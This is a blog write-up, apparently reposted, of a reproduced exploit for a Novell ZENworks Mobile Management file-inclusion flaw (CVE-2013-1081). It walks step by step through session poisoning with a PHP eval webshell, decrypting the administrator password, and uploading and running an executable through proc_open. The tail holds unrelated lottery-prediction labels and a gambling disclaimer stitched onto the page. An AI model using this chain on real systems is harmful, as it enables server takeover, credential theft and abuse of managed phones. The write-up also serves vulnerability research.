Novell Zenworks MDM: Mobile Device Management For The Masses

I'm pretty sure the reason Novell titled their Mobile Device Management (MDM, yo) under the 'Zenworks' group is because the developers of the product HAD to be in a state of meditation (sleeping) when they were writing the code you will see below.


For some reason the other night I ended up on the Vupen website and saw the following advisory on their page:
Novell ZENworks Mobile Management LFI Remote Code Execution (CVE-2013-1081) [BA+Code]
I took a quick look around and didn't see a public exploit anywhere so after discovering that Novell provides 60 day demos of products, I took a shot at figuring out the bug.
The actual CVE details are as follows:
"Directory traversal vulnerability in MDM.php in Novell ZENworks Mobile Management (ZMM) 2.6.1 and 2.7.0 allows remote attackers to include and execute arbitrary local files via the language parameter."
After setting up a VM (Zenworks MDM 2.6.0) and getting the product installed it looked pretty obvious right away ( 1 request?) where the bug may exist:
POST /DUSAP.php HTTP/1.1
Host: 192.168.20.133
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.20.133/index.php
Cookie: PHPSESSID=3v5ldq72nvdhsekb2f7gf31p84
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 74

username=&password=&domain=&language=res%2Flanguages%2FEnglish.php&submit=
Pulling up the source for the "DUSAP.php" script the following code path stuck out pretty bad:
<?php
session_start();

$UserName = $_REQUEST['username'];
$Domain = $_REQUEST['domain'];
$Password = $_REQUEST['password'];
$Language = $_REQUEST['language'];
$DeviceID = '';

if ($Language !== ''  &&  $Language != $_SESSION["language"])
{
     //check for validity
     if ((substr($Language, 0, 14) == 'res\\languages\\' || substr($Language, 0, 14) == 'res/languages/') && file_exists($Language))
     {
          $_SESSION["language"] = $Language;
     }
}

if (isset($_SESSION["language"]))
{
     require_once( $_SESSION["language"]);
} else
{
     require_once( 'res\languages\English.php' );
}

$_SESSION['$DeviceSAKey'] = mdm_AuthenticateUser($UserName, $Domain, $Password, $DeviceID);
In English:

  • Check if the "language" parameter is passed in on the request
  • If the "Language" variable is not empty and if the "language" session value is different from what has been provided, check its value
  • The "validation" routine checks that the "Language" variable starts with "res\languages\" or "res/languages/" and then if the file actually exists in the system
  • If the user has provided a value that meets the above criteria, the session variable "language" is set to the user provided value
  • If the session variable "language" is set, include it into the page
  • Authenticate

So it is possible to include any file from the system as long as the provided path starts with "res/languages" and the file exists. To start off it looked like maybe the IIS log files could be a possible candidate to include, but they are not readable by the user everything is executing under…bummer. The next spot I started looking for was if there was any other session data that could be controlled to include PHP. Example session file at this point looks like this:
$error|s:12:"Login Failed";language|s:25:"res/languages/English.php";$DeviceSAKey|i:0;
The "$error" value is server controlled, the "language" has to be a valid file on the system (cant stuff PHP in it), and "$DeviceSAKey" appears to be related to authentication. Next step I started searching through the code for spots where the "$_SESSION" is manipulated hoping to find some session variables that get set outside of logging in. I ran the following to get a better idea of places to start looking:
egrep -R '\$_SESSION\[.*\] =' ./
This pulled up a ton of results, including the following:
 /desktop/download.php:$_SESSION['user_agent'] = $_SERVER['HTTP_USER_AGENT'];
 Taking a look at the "download.php" file the following was observed:

<?php
session_start();
if (isset($_SESSION["language"]))
{
     require_once( $_SESSION["language"]);
} else
{
     require_once( 'res\languages\English.php' );
}
$filedata = $_SESSION['filedata'];
$filename = $_SESSION['filename'];
$usersakey = $_SESSION['UserSAKey'];

$_SESSION['user_agent'] = $_SERVER['HTTP_USER_AGENT'];
$active_user_agent = strtolower($_SESSION['user_agent']);

$ext = substr(strrchr($filename, '.'), 1);

if (isset($_SESSION['$DeviceSAKey']) && $_SESSION['$DeviceSAKey']  > 0)
{

} else
{
     $_SESSION['$error'] = LOGIN_FAILED_TEXT;
     header('Location: index.php');

}
The first highlighted part sets a new session variable "user_agent" to whatever our browser is sending, good so far.... The next highlighted section checks our session for "DeviceSAKey" which is used to check that the requester is authenticated in the system, in this case we are not so this fails and we are redirected to the login page ("index.php"). Because the server stores our session value before checking authentication (whoops) we can use this to store our payload to be included :)


This will create a session file named "sess_payload" that we can include, the file contains the following:
 user_agent|s:34:"<?php echo(eval($_GET['cmd'])); ?>";$error|s:12:"Login Failed";
 Now, I'm sure if you are paying attention you'd say "wait, why don't you just use exec/passthru/system", well the application installs and configures IIS to use a "guest" account for executing everything – no execute permissions for system stuff (cmd.exe,etc) :(. It is possible to get around this and gain system execution, but I decided to first see what other options are available. Looking at the database, the administrator credentials are "encrypted", but I kept seeing a function being used in PHP when trying to figure out how they were "encrypted": mdm_DecryptData(). No password or anything is provided when calling the fuction, so it can be assumed it is magic:
return mdm_DecryptData($result[0]['Password']); 
Ends up it is magic – so I sent the following PHP to be executed on the server -
$pass=mdm_ExecuteSQLQuery("SELECT Password FROM Administrators where AdministratorSAKey = 1",array(),false,-1,"","","",QUERY_TYPE_SELECT);
echo $pass[0]["UserName"].":".mdm_DecryptData($pass[0]["Password"]);
 


Now that the password is available, you can log into the admin panel and do wonderful things like deploy policy to mobile devices (CA + proxy settings :)), wipe devices, pull text messages, etc….

This functionality has been wrapped up into a metasploit module that is available on github:

Next up is bypassing the fact we cannot use "exec/system/passthru/etc" to execute system commands. The issue is that all of these commands try and execute whatever is sent via the system "shell", in this case "cmd.exe" which we do not have rights to execute. Lucky for us PHP provides "proc_open", specifically the fact "proc_open" allows us to set the "bypass_shell" option. So knowing this we need to figure out how to get an executable on the server and where we can put it. The where part is easy, the PHP process user has to be able to write to the PHP "temp" directory to write session files, so that is obvious. There are plenty of ways to get a file on the server using PHP, but I chose to use "php://input" with the executable base64'd in the POST body:
$wdir=getcwd()."\..\..\php\\\\temp\\\\";
file_put_contents($wdir."cmd.exe",base64_decode(file_get_contents("php://input")));
This bit of PHP will read the HTTP post's body (php://input) , base64 decode its contents, and write it to a file in a location we have specified. This location is relative to where we are executing so it should work no matter what directory the product is installed to.


After we have uploaded the file we can then carry out another request to execute what has been uploaded:
$wdir=getcwd()."\..\..\php\\\\temp\\\\";
$cmd=$wdir."cmd.exe";
$output=array();
$handle=proc_open($cmd,array(1=>array("pipe","w")),$pipes,null,null,array("bypass_shell"=>true));
if(is_resource($handle))
{
     $output=explode("\\n",+stream_get_contents($pipes[1]));
     fclose($pipes[1]);
     proc_close($handle);
}
foreach($output+as &$temp){echo+$temp."\\r\\n";};
The key here is the "bypass_shell" option that is passed to "proc_open". Since all files that are created by the process user in the PHP "temp" directory are created with "all of the things" permissions, we can point "proc_open" at the file we have uploaded and it will run :)

This process was then rolled up into a metasploit module which is available here:


Update: Metasploit modules are now available as part of metasploit.

Related articles


No comments:

Post a Comment

Labels

14.6.2014 draw 297/14 19 Mei 2013 23 Jun 2013 24.04.2013 25 Jun 2013 4 mei 2014 - draw 278/14 6 mei 2014 Adakah anda bersetuju dengan pernyataan tentang zakar ini? BERIKUT MERUPAKAN NOMBOR RAMALAN UNTUK MAGNUM 4D PADA 30 OGOS 2014 draw 143/13 draw 279/14 DRAW ID 098/13. DRAW ID 099/13: NOMBOR RAMALAN UNTUK MAGNUM 4D PADA 4 MEI 2013 DRAW ID 139/13. DRAW ID 141/13. DRAW ID 142/13 DRAW ID 142/13 / PREDICTION FOR MAGNUM 4D COUNTER ON 3 AUGUST 2013 ID CABUTAN 098/13 / PREDICTION FOR MAGNUM 4D COUNTER ON 1 MAY 2013 ID CABUTAN 099/13 / ID CABUTAN 139/13 / PREDICTION FOR MAGNUM 4D COUNTER ON 27 JULY 2013 ID CABUTAN 141/13 / PREDICTION FOR MAGNUM 4D COUNTER ON 31 JULY 2013 Keputusan dan perbandingan antara nombor ramalan dan result Magnum 4D pada 31 Julai 2013 Keputusan Magnum 4D Kerja part time/ sambilan : Peluang tambah pendapatan Magnum 4d result 1 May 2013 Draw 098/13 Magnum draw 094/13 nombor 4d 6.7.2014 308/14 Nombor 4d untuk hari ini : 21/04/2013 nombor magnum 4d draw 107/13 ; Ahad nombor magnum 4d untuk draw 101/13: 7 mei 2013 ( magnum 4d prediction number for draw 101/13 : 7 may 2013 Nombor ramalan 4d : 24.04.2013 Nombor ramalan dan keputusan Magnum 4D draw 119/13 pada 15 Jun 2013 Nombor ramalan Magnum 4D 4 Ogos 2013 draw 143/13 Nombor ramalan Magnum 4D 7 Ogos 2013 draw 144/13 nombor ramalan Magnum 4D dan result pada 4 Ogos 2013 Nombor ramalan magnum 4d draw 112/13 29 Mei 2013 Nombor ramalan Magnum 4D pada 1 Jun 2013 draw 113/13 nombor ramalan magnum 4d pada 14.6.2014 draw 297/14 Nombor ramalan Magnum 4D pada 2 Jun 2013 Draw 114/13 nombor ramalan magnum 4d pada 23 ogos 2014 draw 329/14 Nombor ramalan magnum 4d pada 26.05.2015 draw 467/15 - special draw Nombor Ramalan Magnum 4D pada 30 April 2014 draw 276/14 nombor ramalan magnum 4d pada 30 ogos 2014 draw 333/14 nombor ramalan magnum 4d pada 4 mei 2014 - draw 278/14 Nombor ramalan magnum 4d pada 5 julai 2014 hari sabtu draw 307/14 nombor ramalan magnum 4d pada 7 september 2014 draw 338/14 ( 7.9.2014/338/14) nombor ramalan magnum 4d pada 8 Februari 2014 (8/2/2014) draw 235/14 nombor ramalan magnum 4d pada hari ahad nombor ramalan magnum 4d pada hari ahad 6 julai 2014 draw 308/14 nombor ramalan magnum 4d pada hari rabu 25 september 2013 draw 168/13 nombor ramalan magnum 4d pada hari rabu 9 julai 2014 draw 309/14 nombor ramalan magnum 4d pada hari sabtu nombor ramalan magnum 4d pada hari sabtu 13.9.2014 draw 340/14 nombor ramalan magnum 4d pada hari sabtu 26 oktober 2013 draw 182/13 nombor ramalan magnum 4d pada hari selasa Nombor ramalan Magnum 4D untuk draw 118/13 pada hari Rabu 12 Jun 2013 Nombor ramalan Magnum 4D untuk draw 119/13 pada hari Sabtu 16 Jun 2013 Nombor ramalan Magnum 4D untuk draw 120/13 pada hari Ahad 16 Jun 2013 Nombor ramalan Magnum 4D untuk draw 121/13 pada hari Rabu 19 Jun 2013. Nombor ramalan Magnum 4D untuk draw 123/13 pada hari Ahad Nombor ramalan Magnum 4D untuk draw 124/13 pada hari Selasa (special draw) Nombor ramalan Magnum 4D untuk draw 231/14 pada hari Sabtu 1 Februari 2014 Nombor ramalan Magnum 4D untuk hari Sabtu 7 Ogos 2013 draw 149/13 Nombor ramalan Magnum 4D untuk hari Selasa 3 September 2013 draw 158/13 | SPECIAL DRAW Nombor ramalan MAGNUM 4D untuk special draw 111/13 28 Mei 2013 Nombor ramalan untuk hari Rabu nombor ramalan untuk MAGNUM 4D Nombor ramalan untuk magnum 4d draw 105/13: 15 Mei 2013 Nombor ramalan untuk magnum 4d draw 120/13 dan keputusan/result magnum 4d pada 16 Jun 2013 NOMBOR RAMALAN UNTUK MAGNUM 4D PADA 1 MEI 2013 NOMBOR RAMALAN UNTUK MAGNUM 4D PADA 27 JULAI 2013 NOMBOR RAMALAN UNTUK MAGNUM 4D PADA 3 OGOS 2013 NOMBOR RAMALAN UNTUK MAGNUM 4D PADA 31 JULAI 2013 nombor ramalan untuk magnun 4d pada 3 mei 2014-277/14 nombor untuk magnum 4d draw 095/13 : 27 April 2013 PREDICTION FOR MAGNUM 4D ON 4 MAY 2013 ramalan magnum 4d 9.7.14 309/14 Ramalan pada 12 Jun 2013 dan keputusan Magnum 4D Result 21.4.2013 Cash Sweep Result 21.4.2013 DaMaCai Result 21.4.2013 Magnum Result 21.4.2013 Toto special draw 28 Mei 2013 special draw pada 28 MEI 2013. TERKINI| TERBARU: nombor magnum 4d 7 mei 2013; 101/13 ; special draw Toto draw 3871/13

**Penafian**

Nombor ramalan hanyalah sebagai panduan dan dicadangkan untuk MAGNUM SAHAJA (atau kaunter lain sekiranya sesuai) . Segala pertaruhan adalah atas risiko anda sendiri.